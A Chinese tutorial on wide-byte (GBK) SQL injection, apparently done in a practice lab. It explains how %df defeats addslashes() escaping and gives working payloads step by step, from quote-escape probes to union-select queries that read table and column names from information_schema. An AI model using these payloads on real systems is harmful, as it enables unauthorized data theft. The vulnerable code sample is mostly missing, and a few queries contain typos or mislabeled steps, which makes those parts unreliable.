SQL注入之宽字节注入攻击
目录
1 宽字节注入代码分析
2 数据库展示
3 注入过程
1 宽字节注入代码分析
在宽字节注入页面中,程序获取GET参数ID,并对参数ID使用addslashes()转义,然后拼接到SQL语句中,进行查询,代码如下。
The Query String is : ".$sql ."
";
?>
当访问id=1'时,执行的SQL语句为:
SELECT * FROM users WHERE id='1\''可以看到单引号被转义符"\” 转义,所以在一般情况下,是无法注入的,但由于在数据库查询前执行了SET NAMES' GBK',将编码设置为宽字节GBK,所以此处存在宽字节注入漏洞。
在PHP中,通过iconv () 进行编码转换时,也可能存在宽字符注入漏洞。
2 数据库展示
3 注入过程
访问id=1',页面的返回结果如图所示,程序并没有报错,反而多了一个转义符(反斜杠\)
单引号被转义
从返回的结果可以看出,参数id=1在数据库查询时是被单引号包围的。当传入id=1' 时,传入的单引号又被转义符(反斜线)转义,导致参数ID无法逃逸单引号的包围,所以在一般情况下,此处是不存在SQL注入漏洞的。不过有一个特例, 就是当数据库的编码为GBK时,可以使用宽字节注入,宽字节的格式是在地址后先加一个%df,再加单引号,因为反斜杠的编码为%5c,而在GBK编码中,%df%5c是繁体
字"連",所以这时,单引号成功逃逸,报出MySQL数据库的错误,如图所示。
由于输入的参数id=1',导致SQL语句多了一个单引号,所以需要使用注释符来注释程序自身的单引号。访问id=1%df'%23,页面返回的结果如图所示,可以看到,SQL语句已经符合语法规范。
使用and 1=1和and 1=2进一步判断注入,访问 id=1%df' and 1=1%23 和 id=1%df' and 1=2%23,返回结果如下两图所示。
当and 1= 1程序返回正常时,and 1= 2程序返回错误,所以判断该参数ID存在SQL注入漏洞
接着使用order by查询数据库表的字段数量,最后得知字段数为3,如下所示。
order by 3没问题
order by 4出问题啦
因为页面直接显示了数据库中的内容,所以可以使用Union查询。与Union注入一样,此时的Union语句是union select 1, 2, 3,为了让页面返回Union查询的结果,需要把ID的值改为负数,结果如图所示。
于是后面就是正常的union注入了。尝试在页面中2的位置查询当前数据库的库名(database () ),语句为:
id=-1%df' union select 1, user(),3%23
返回的结果如上图所示。
查询数据库的表名时,一把使用如下语句。
select table_name from information_schema.tables where table_schema='security' limit 0,1但是此时,由于单引号被转义,会自动多出反斜杠,导致SQL语句出错,所以此处需要利用另一种方法:嵌套查询。就是在一个查询语句中, 再添加一个查询语句,下列就是更改后的查询数据库表名的语句。
select table_name from information_schema.tables where table_schema= (select databse()) limit0,1可以看到,原本的table_schema='security'变成了table_schema=(select database()),因为select database () 的结果就是'security',这就是嵌套查询,结果如下图所示。
id=-1%df' union select 1,(select table_name from information_schema.tables where table_schema=(select database())limit 0,1),3%23
从返回结果可以看到,数据库的第一个表名是emails, 如果想查询后面的表名,还需修改limit后的数字,这里不再重复。使用以下语句尝试查询emails表里的字段。
id=-1%df' union select 1,(select column_name from information_schema.columns where table_schema=(select database()) and table_name=(select table_name from information_schema.tables where table_schema=(select database()) limit 0,1)limit 0,1),3%23
这里使用了三层嵌套,第一层是table_ schema,它代表库名的嵌套,第二层和第三层是table_ name的嵌套。我们可以看到语句中有两个limit,前一个limit控制表名的顺序,后一个则控制字段名的顺序。如这里查询的不是emails表,而是users表,则需要更改limit的值。如上图所示,后面的操作如Union注入所示,这里不再重复。